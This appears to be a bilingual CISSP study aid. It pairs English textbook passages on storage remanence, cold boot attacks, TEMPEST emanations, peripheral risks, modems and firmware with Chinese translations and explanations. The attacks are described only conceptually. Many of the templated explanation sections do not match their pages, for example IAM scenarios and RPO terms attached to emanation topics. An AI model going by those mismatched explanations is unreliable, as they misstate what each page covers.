You can use a memory address to access information stored at any point within a RAM chip without reading the data that is physically stored before it. Most secondary storage devices are also random access. Sequential storage devices, on the other hand, do not provide this flexibility. They require you to read (or speed past) all the data physically stored before the desired location. A common example of a sequential storage device is a magnetic tape drive. Memory Security Issues Memory stores and processes your data—some of which may be extremely sensitive. Any memory devices that may retain sensitive data should be purged before they are allowed to leave your organization for any reason.

This

中文直译 / 整理

数据存储设备 用于存储计算机在写入后随时可能使用的信息。 主存储与辅助存储 主存储,也称为主存储,是计算机在运行时用于保存必要信息并供CPU快速 访问的RAM。 辅助存储(或辅助存储)包括您经常使用的各种长期存储设备。 辅助存储由磁性、光学和闪存介质组成,例如硬盘驱动器(HDD)、固态硬 盘(SSD)、闪存驱动器、磁带、CD、DVD和闪存卡。 易失性与非易失性 存储设备的易失性是指其在断电或电源循环时丢失数据的可能性。 设计用于保 留数据的设备(如磁性介质、闪存介质、ROM和光学介质)被归类为非易失性, 而像静态或动态RAM模块这类在断电后会丢失数据的设备则被归类为易失性。 随机访问与顺序访问 存储设备的访问方式有两种。 随机访问存储设备允许操作系统通过某种寻址系 统立即从设备的任意位置读取(有时也写入)数据。 几乎所有主存储设备都是 随机访问设备。 您可以使用内存地址直接访问RAM芯片中任意位置存储的信息, 而无需读取其物理位置之前的數據。 大多数辅助存储设备也是随机访问的。 顺序存储设备则不具备这种灵活性。 它们要求您读取(或快速经过)目标位置 之前所有物理存储的数据。 顺序存储设备的一个常见例子是磁带驱动器。

内存安全问题 内存存储并处理您的数据——其中一些可能极为敏感。 任何可能保留敏感数据 的内存设备,在因任何原因离开您的组织之前都应被清除。 此

小白解释

场景先行:你是公司的安全负责人,正在读第 564 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 564 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 22 / PDF P565

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

is especially true for secondary memory and ROM/PROM/EPROM/EEPROM devices designed to retain data even after the power is turned off. However, memory data retention issues are not limited to secondary memory (i.e., storage devices). It is technically possible that the electrical components used in volatile primary memory could retain some of their charge for a limited period of time after power is turned off. A technically sophisticated individual could theoretically retrieve portions of the data stored on such devices.

A memory compromise called the cold boot attack freezes memory chips to delay the decay of resident data when the system is turned off or the RAM is pulled out of the motherboard (see en.wikipedia.org/wiki/Cold_boot_attack). There are even attacks and tools that focus on memory image dumps or system crash dumps to extract encryption keys (see www.passware.com/kit-forensic). Storage Media Security There are several concerns when it comes to the security of secondary storage devices: Data may remain on secondary storage devices even after it has been erased. This condition is known as data remanence.

Utilities are available that can retrieve files from a disk even after they have been deleted or reformatted. If you truly want to remove data from a secondary storage device, you must use a specialized utility designed to overwrite all traces of data on the device (commonly called sanitizing) or damage or destroy it beyond possible repair. (See Chapter 5, “Protecting Security of Assets.”)

中文直译 / 整理

点对于二级内存以及设计为在断电后仍能保留数据的 ROM/PROM/EPROM/EEPROM 设备尤其重要。 然而,内存数据保留问题不仅限于二级内存(即存储设备)。 从技术上讲,挥 发性主内存中使用的电子元件在断电后仍可能在有限时间内保留部分电荷。 技 术娴熟的个人理论上可以检索这些设备上存储的部分数据。 一种称为冷启动攻击的内存泄露方式,通过冷冻内存芯片来延缓系统关机或 RAM从主板拔出时驻留数据的衰减(参见 en.wikipedia.org/wiki/Cold bootattack)。 甚至还有攻击和工具_ _ 专门针对 内存镜像转储或系统崩溃转储以提取加密密钥(参见 www.passware.com/kit-forensic)。 存储介质安全 在二级存储设备的安全性方面,存在若干问题: 即使数据已被删除,仍可能保留在辅助存储设备上。 这种状况被称为数据 残余。 存在一些工具能够在文件被删除或重新格式化后仍从磁盘中恢复文 件。 如果您真正希望从辅助存储设备中移除数据,则必须使用专门设计用 于覆盖设备上所有数据痕迹的工具(通常称为安全清理),或使其受损或 销毁至无法修复的程度。 (参见第5章,“保护资产安全”。 )

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

保留期限:保留期限规定数据、日志或记录要保存多久。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
保留期限 保留期限规定数据、日志或记录要保存多久。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 23 / PDF P566

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

SSDs are large-capacity flash memory secondary storage devices. Many SSDs include additional reserved memory blocks, which can be used in place of bad blocks. As blocks are written to or erased, they deteriorate at a predictable failure rate. Many SSD manufacturers counter this failure rate with two main techniques: reserved blocks and wear leveling. When a block stops working reliably, it is marked as bad, and a reserve block is then used in its place. This is similar to an HDD's bad sectors. Wear leveling attempts to perform write and erase events evenly across the entire drive's capacity of blocks to maximize use lifetime.

A traditional zeroization wipe is less effective for SSDs because bad blocks/cells are likely not overwritten. Secondary storage devices are also prone to theft. Economic loss is not the major factor (after all, how much does a backup tape or a hard drive cost?), but the loss of confidential information poses the great risks. For this reason, it is important to use full-disk encryption to reduce the risk of an unauthorized entity gaining access to your data. Many HDDs, SSDs, and flash devices offer on-device native encryption. Removable media pose a significant information disclosure risk, so securing them often requires encryption technologies.

Emanation Security Many electrical devices emanate electrical signals or radiation that can be intercepted and may contain confidential, sensitive, or private data. Obvious examples of emanation devices are wireless networking equipment and mobile phones, but many other devices are vulnerable to emanation interception that you might not expect, including monitors, network cables, modems, and internal or external media drives (hard drives, USB thumb drives, CDs, and so on). With the right equipment, adversaries can intercept electromagnetic or radio frequency signals (collectively known as emanations) from these devices and interpret them to extract confidential data. SSD

中文直译 / 整理

是大容量闪存辅助存储设备。 许多SSD包含额外的保留内存块, 可用于替代损坏的块。 当块被写入或擦除时,它们会以可预测的故障率 退化。 许多SSD制造商通过两种主要技术来应对这一故障率:保留块和 磨损均衡。 当某个块无法可靠工作时,它会被标记为坏块,然后使用保 留块替代它。 这类似于硬盘的坏扇区。 磨损均衡旨在在整个驱动器的块 容量上均匀执行写入和擦除操作,以最大化使用寿命。 传统的零化擦拭对SSD效果较差,因为坏块/单元可能不会被覆盖。 辅助存储设备也容易被盗。 经济损失并非主要因素(毕竟,备份磁带或硬 盘的成本能有多少? ),但机密信息的泄露会带来巨大风险。 因此,使用 全盘加密以降低未经授权的实体访问您数据的风险至关重要。 许多HDD、 SSD和闪存设备都提供设备内置加密功能。 可移动介质存在重大的信息泄露风险,因此保护它们通常需要采用加密 技术。 电磁安全 许多电子设备会发出电信号或辐射,这些信号可能被截获并包含机密、敏感 或私密数据。 无线网络设备和手机是明显的辐射源示例,但许多其他设备也 容易受到辐射截获,而您可能未曾想到,包括显示器、网络电缆、调制解调 器以及内部或外部存储介质(硬盘、USB闪存盘、CD等)。

借助适当的设备, 攻击者可以截获这些设备发出的电磁或射频信号(统称为辐射),并解读这 些信号以提取机密数据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 24 / PDF P567

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

There are many valid uses of emanations, such as Wi-Fi, Bluetooth, GPS, and mobile phone signals. The types of countermeasures and safeguards used to protect against emanation attacks are derived from TEMPEST. TEMPEST (Telecommunications Electronics Material Protected from Emanating Spurious Transmissions) was originally a government research study aimed at protecting electronic equipment. It refers to a set of standards and guidelines used to minimize the unintentional electromagnetic signals that could be emitted by electronic equipment and potentially intercepted, leading to unauthorized access to sensitive information.

The term TEMPEST has become less common, and the corresponding security discipline is now commonly known as EMSEC. Emission Security (EMSEC) involves implementing various measures to prevent unauthorized individuals from obtaining valuable information that could be derived through intercepting and analyzing compromising emanations from cryptographic equipment, automated information systems (AISs), and telecommunications systems. It has since expanded to a general study of monitoring emanations and preventing their interception.

Simply because of the kinds of electronic components from which they're built, many computer hardware devices emit electromagnetic (EM) radiation during normal operation. The process of communicating with other machines or peripheral equipment creates emanations that can be intercepted. These emanation leaks can cause serious security issues but are generally easy to address. TEMPEST/EMSEC attacks read the electronic emanations that devices produce (known as Van Eck radiation) from a distance (this process is known as Van Eck phreaking).

TEMPEST/EMSEC eavesdropping or Van Eck phreaking countermeasures include the following: Faraday Cage A Faraday cage is a box, mobile room, or entire building designed with an external metal skin, often a wire mesh that fully surrounds an area on all sides. This metal skin acts as an EMabsorbing capacitor that prevents electromagnetic signals (emanations) from exiting or entering the area that the cage encloses.

中文直译 / 整理

辐射有多种合法用途,例如Wi‑Fi、蓝牙、GPS和移动电话信号。 用于防范辐射攻击的对策和防护措施源于TEMPEST。 TEMPEST( Telecommunications Electronics Material Protected from E manating Spurious Transmissions)最初是一项政府研究项目,旨在保护 电子设备。 它指的是一套标准和指南,用于最小化电子设备可能无意中发出的 电磁信号,这些信号若被截获,可能导致对敏感信息的未授权访问。 术语 TEMPEST现已较少使用,相应的安全领域现在通常被称为EMSEC。 辐射安全 (EMSEC)涉及实施各种措施,以防止未经授权的人员通过截获和分析加密设 备、自动化信息系统(AIS)和电信系统中的有害辐射而获取有价值的信息。 它已扩展为对辐射监测及其截获防范的普遍研究。 由于其构成的电子元件类型,许多计算机硬件设备在正常运行期间会发出电磁 (EM)辐射。 与其它机器或外围设备通信的过程会产生可被截获的辐射。 这些 辐射泄漏可能引发严重的安全问题,但通常易于解决。

TEMPEST/EMSEC攻击可以从远处读取设备产生的电子辐射(称为VanEck辐 射)(此过程称为VanEck窃听)。 TEMPEST/EMSEC窃听或Van Eck窃听的 防范措施包括以下内容: 法拉第笼 一个法拉第笼是一种箱体、移动房间或整个建筑,其外部覆盖金 属层,通常为金属网,完全包围区域的各个侧面。 这种金属层充当电磁吸 收电容器,防止电磁信号(泄漏)进出笼子所封闭的区域。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 25 / PDF P568

第 568 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

White Noise White noise simply means broadcasting false traffic to mask and hide the presence of real emanations. White noise can consist of a real signal from another source that is not confidential, a constant signal at a specific frequency, a randomly variable signal, or even a jam signal that causes interception equipment to fail. Although this is similar to jamming devices, the purpose is to convolute the signal only for the eavesdropper, not the authorized user, rather than stopping even valid uses of emanations. White noise describes any random sound, signal, or process that can drown out meaningful information.

This can vary from audible frequencies to inaudible electronic transmissions, and it may even involve the deliberate act of creating line or traffic noise to disguise origins or disrupt listening devices. Control Zone A third type of TEMPEST/EMSEC countermeasure, a control zone, is simply implementing a Faraday cage and white noise generation to protect a specific area in an environment; the rest of the environment is unaffected. A control zone can be a room, a floor, or an entire building. In addition to the TEMPEST/EMSEC derived countermeasure technologies concepts, shielding, access control, and antenna management can be helpful against emanation eavesdropping.

Shielding of cables (networking and otherwise) may be sufficient to reduce or block emanation access. This may be an element included in the manufacture of equipment, such as shielded twisted pair (STP) cabling, or may be accomplished by using shielding conduits or just replacing copper network cables with fiber-optic cables. Input and Output Devices Input and output devices can present security risks to a system. Security professionals should be aware of these risks and ensure that appropriate controls are in place to mitigate them. Monitors

中文直译 / 整理

白噪声 白噪声 仅仅是广播虚假信号以掩盖真实泄漏的存在。 白噪声可以由 另一个非机密来源的真实信号、特定频率的恒定信号、随机变化的信号, 甚至导致拦截设备失效的干扰信号组成。 尽管这与干扰设备类似,但其目 的是仅使窃听者混淆信号,而非影响授权用户的正常使用,而不是阻止电 磁泄漏的合法用途。 白噪声 指任何可以掩盖有意义信息的随机声音、信号或过程。 这 可以涵盖从可听频率到不可听的电子传输,甚至可能包括故意制造线路 或交通噪音以掩盖来源或干扰监听设备的行为。 控制区 是一种第三类 TEMPEST/EMSEC 防护措施,即通过实施法拉第 笼和白噪声生成来保护环境中的特定区域; 环境的其余部分不受影响。 控 制区可以是一个房间、一层楼,或整栋建筑。 除了 TEMPEST/EMSEC 衍生的防护技术概念外,屏蔽、访问控制和天线管 理也有助于防范辐射窃听。 屏蔽 电缆(包括网络电缆及其他类型)可能足以 减少或阻断辐射泄露。 这可能是设备制造中包含的要素,例如屏蔽双绞线( STP)电缆,或可通过使用屏蔽管道,或直接将铜质网络电缆替换为光纤电缆 来实现。 输入和输出设备 输入和输出设备可能对系统构成安全风险。

安全专业人员应了解这些风险, 并确保采取适当的控制措施以减轻这些风险。 显示器

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 568 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 26 / PDF P569

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

TEMPEST/EMSEC eavesdropping technology can compromise the security of data displayed on a monitor. This may be accomplished by eavesdropping on the video cable or the monitor itself. It is arguable that the biggest risk with any monitor is still shoulder surfing or cameras. Don't forget shoulder surfing is a concern for desktop displays, laptop displays, tablets, and mobile phones. Printers Printers also represent a security risk that is easy to overlook. Depending on the physical security controls used at your organization, it may be much easier to walk out with sensitive information in printed form than to walk out with a flash drive or magnetic media.

If printers are shared, users may forget to retrieve their sensitive printouts, leaving them vulnerable to prying eyes. Many modern printers also store data locally, often on a hard drive, and some retain copies of printouts indefinitely. Printers are usually exposed on the network for convenient access and are often not designed to be secure systems. Concerns should also apply to multifunction printers (MFPs), especially those that include fax capabilities and that are network-attached (whether wired or wireless).

In 2018, researchers discovered that it is still possible to take control of a computer system over a public switched telephone network (PSTN) line using ancient AT commands supported by telephone modems and fax modems/machines. See the researcher's DEFCON 26 presentation PDF at media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/DEFCON -26-Yaniv-Balmas-What-The-FAX.pdf. If you don't always need fax capabilities, don't leave the telephone line plugged in. If you do need alwaysavailable fax capabilities, use a stand-alone fax machine. Keyboards/Mice Keyboards, mice, and similar input devices are not immune to security vulnerabilities.

All of these devices are vulnerable to TEMPEST/EMSEC monitoring, whether wired or wireless. Also, keyboards are vulnerable to less sophisticated bugging. A simple device can be placed inside a keyboard or along its connection cable to intercept all the keystrokes that take place and transmit them to a remote receiver using a radio signal. This has the same effect as TEMPEST/EMSEC monitoring but can be done with much less expensive gear. Additionally, if your keyboard and mouse are wireless, including Bluetooth, their radio signals can be intercepted. TEMPEST/EMSEC

中文直译 / 整理

窃听技术可能危及显示器上显示的数据的安全性。 这可以通 过窃听视频电缆或显示器本身来实现。 可以说,任何显示器最大的风险仍然是 肩窥或摄像头。 不要忘记,肩窥对台式机显示器、笔记本电脑显示器、平板电 脑和手机都是一个需要关注的问题。 打印机 打印机还代表一种容易被忽视的安全风险。 根据您组织所使用的物理安全控制 措施,将敏感信息以打印形式带走可能比携带闪存驱动器或磁性介质更容易。 如果打印机是共享的,用户可能会忘记取回他们的敏感打印件,使其容易被他 人窥视。 许多现代打印机还会在本地存储数据,通常是在硬盘上,有些甚至会 无限期地保留打印件的副本。 打印机通常为了方便访问而暴露在网络中,且通 常并非设计为安全系统。 还应关注多功能打印机(MFPs),尤其是那些包含传真功能且通过网络连接 (有线或无线)的设备。 2018年,研究人员发现,仍可通过电话调制解调器 和传真调制解调器/设备支持的古老AT命令,利用公共交换电话网络(PST N)线路控制计算机系统。

有关研究人员的DEFCON 26演示文稿PDF,请参 阅 media.defcon.org/DEF%20CON%2026/DEF%20CON%2026% 20presentations/DEFCON-26-Yaniv-Balmas-What-The-FAX.pdf。 如果您并不总是 需要传真功能,请不要将电话线一直插着。 如果您确实需要随时可用的传真功 能,请使用独立的传真机。 键盘/鼠标 键盘、鼠标和类似的输入设备并非对安全漏洞免疫。 所有这些设备,无论有线 还是无线,都容易受到TEMPEST/EMSEC监控。 此外,键盘还容易受到不太 复杂的窃听攻击。 一种简单的设备可以被放置在键盘内部或其连接电缆上,以 拦截所有击键操作,并通过无线电信号将它们传输到远程接收器。 这与 TEMPEST/EMSEC监控的效果相同,但可以使用便宜得多的设备实现。 另外, 如果您的键盘和鼠标是无线的,包括蓝牙,它们的无线电信号也可能被截获。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 27 / PDF P570

第 570 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

POTS Telephone Modems With the advent of ubiquitous broadband and wireless connectivity, telephone modems are becoming a scarce legacy computer component. If your organization is still using older equipment, there is a chance that a modem is part of the hardware configuration. Modems allow users to create uncontrolled access points into your network. If improperly configured, they can create extremely serious security vulnerabilities that allow an outsider to bypass all your perimeter protection mechanisms and directly access your network resources. Modems create an alternate egress channel that insiders can use to funnel data outside your organization.

But keep in mind that these vulnerabilities can be exploited only if the modem is connected to an operational telephone landline. The same risk of creating a security perimeter bypass exists when systems have both wired and wireless NICs. Systems should typically be restricted to using only one method/means of connection at a time. For example, if a cable is connected to the system's RJ45 jack, then the wireless interface should be deactivated. It may also be worth considering that for devices that exit and enter the premises a geofencing type system be used, where wireless connection devices are deactivated as the equipment enters the facility.

See more on this in Chapter 11, “Secure Network Architecture and Components.” You should seriously consider an outright ban on telephone modems in your organization's security policy unless you truly need them for business reasons. In those cases, security officials should know the physical and logical locations of all modems on the network, ensure that they are correctly configured, and make certain that appropriate protective measures are in place to prevent their illegitimate use. Firmware Firmware (also known as microcode) is a term used to describe software that is stored in a ROM or an EEPROM chip.

This type of software is changed infrequently (actually, never, if it's stored on a true ROM chip as opposed to an EEPROM or flash chip) and often drives the basic operation of a computing device. POTS

中文直译 / 整理

电话调制解调器 随着宽带和无线连接的普及,电话调制解调器正逐渐成为稀缺的遗留计算机组 件。 如果您的组织仍在使用较旧的设备,调制解调器可能是硬件配置的一部分。 调制解调器允许用户创建不受控制的网络接入点。 如果配置不当,它们可能造 成极其严重的安全漏洞,使外部人员能够绕过您所有的边界防护机制,直接访 问您的网络资源。 调制解调器还提供了一条备用的外联通道,内部人员可利用 它将数据外传。 但请注意,这些漏洞只有在调制解调器连接到正常工作的电话 固话线路时才能被利用。 当系统同时具有有线和无线网卡时,同样存在绕过安全边界的风险。 系 统通常应限制为一次仅使用一种连接方式。 例如,如果电缆连接到系统的 RJ45接口,则应停用无线接口。 还值得考虑的是,对于进出场所的设备, 可使用地理围栏系统,在设备进入设施时停用无线连接设备。 更多相关内容 请参见第11章,“安全网络架构与组件。 ” 除非您确实因业务原因需要电话调制解调器,否则应在组织的安全策略中坚决 禁止使用电话调制解调器。 在这些情况下,安全人员应了解网络上所有调制解 调器的物理和逻辑位置,确保其配置正确,并采取适当的保护措施,防止其被 非法使用。

固件 固件(也称为微码)是一个术语,用于描述存储在ROM或EEPROM芯片中的 软件。 这种软件很少被更改(实际上,如果存储在真正的ROM芯片上而非 EEPROM或闪存芯片上,则永远不会更改),并且通常驱动计算设备的基本操 作。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

安全边界:安全边界是不同信任级别或安全要求交接的位置。

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 570 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 28 / PDF P571

第 571 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Many hardware devices, such as printers and modems, need some limited set of instructions and processing power to complete their tasks while minimizing the burden placed on the OS itself. In many cases, these “mini” OSs are entirely contained in firmware chips onboard the devices they serve. Many devices commonly use firmware as their primary OS, including mobile devices, Internet of Things (IoT) equipment, edge computing devices, fog computing devices, and industrial control systems. Basic input/output system (BIOS) is the legacy basic low-end firmware or software embedded in a motherboard's EEPROM or flash chip.

The BIOS contains the OS-independent primitive instructions that a computer needs to start up and load the OS from disk. The BIOS identifies and initiates the basic system hardware components, such as the hard drive, optical drive, and video card, so that the bootstrapping process of loading an OS can begin. In most modern systems, the BIOS has been replaced by UEFI.

Unified Extensible Firmware Interface (UEFI) provides support for all of the same functions as BIOS with many improvements, such as support for larger hard drives (especially for booting), faster boot times, enhanced security features, and even the ability to use a mouse when making system changes (BIOS was limited to keyboard control only). UEFI also includes a CPUindependent architecture, a flexible pre-OS environment with networking support, measured boot, boot attestation (aka secure boot), and backward and forward compatibility. It also runs CPU-independent drivers (for system components, drive controllers, and hard drives).

The process of updating the UEFI, BIOS, or firmware is known as flashing. If bad actors or malware can alter the UEFI, BIOS, or firmware of a system, they may be able to bypass security features or initiate otherwise prohibited activities. There have been a few examples of malicious code embedding itself into UEFI, BIOS, or firmware. There is also an attack known as phlashing, in which a malicious variation of official BIOS or firmware is installed that introduces remote control or other malicious features into a device.

